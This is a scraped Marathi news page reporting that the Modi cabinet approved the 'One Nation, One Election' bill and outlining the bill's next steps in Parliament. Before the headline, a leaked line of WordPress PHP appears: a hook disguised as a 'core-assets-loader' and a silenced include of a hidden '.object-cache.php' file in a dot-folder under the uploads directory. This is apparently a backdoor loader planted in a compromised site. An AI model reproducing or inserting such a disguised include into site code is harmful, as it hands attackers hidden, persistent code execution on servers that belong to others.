add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मोठी बातमी! ‘एक देश एक निवडणूक’ विधेयकाला अखेर मोदी कॅबिनेटची मंजुरी – SOCH INDIA
Menu

देश
मोठी बातमी! ‘एक देश एक निवडणूक’ विधेयकाला अखेर मोदी कॅबिनेटची मंजुरी

nobanner

एक देश, एक निवडणूक विधेयकाला गुरुवारी मोदी सरकारच्या मंत्रिमंडळाने मंजुरी दिली आहे. सूत्रांच्या माहितीनुसार, सरकार हे विधेयक आता संसदेत सादर करण्याची शक्यता आहे. सध्या हिवाळी अधिवेशन सुरु असून पुढच्या आठवड्यात हे विधेयक संसदेत मांडलं जाण्याची शक्यता असल्याची सूत्रांची माहिती आहे. सर्वात आधी संयुक्त संसदीय समिती गठीत केला जाईल. यानंतर सर्व पक्षांकडून सूचना, सल्ले मागवले जातील. अखेरीस हे विधेयक संसदेत आणलं जाईल आणि नंतर ते पारित केलं जाईल. याआधी रामनाथ कोविंद यांच्या नेतृत्वातील समितीने सरकारकडे ‘एक देश, एक निवडणूक’ संदर्भात आपला रिपोर्ट सादर केला होता.